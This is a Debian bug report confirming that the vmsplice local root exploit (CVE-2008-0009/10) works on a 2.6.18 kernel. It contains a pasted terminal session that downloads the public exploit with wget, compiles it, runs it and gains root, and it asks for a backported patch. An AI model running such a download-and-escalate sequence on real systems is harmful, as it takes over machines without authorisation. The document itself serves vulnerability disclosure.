
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)



Yep, I'm sure.

Copy of exploit: http://www.securityfocus.com/bid/27704/exploit

doktor@doktor:~/coding/sample$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
--12:25:09-- http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
  => `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23
Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[=================================================================================================================>] 6,264 28.84K/s

12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]

doktor@doktor:~/coding/sample$ vi 27704.c
doktor@doktor:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
doktor@doktor:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
doktor@doktor:~/coding/sample$ head -n 20 27704.c
/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don't remeber original intent of all
 * the code, so I'm not 100% sure about it. You've been warned ;)
 *
 * -static -Wno-format
 */
#define _GNU_SOURCE
#include <stdio.h>
doktor@doktor:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl
doktor@doktor:~/coding/sample$ ./root_expl
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
root@doktor:~/coding/sample# id
uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
root@doktor:~/coding/sample# exit
doktor@doktor:~/coding/sample$

So the exploit works.


2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
* Okulov Vitaliy:

> Just try exploit from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

Milw0rm is down.  Are you sure the exploit is real?  The vulnerable code
is not present in the 2.6.18 kernel.


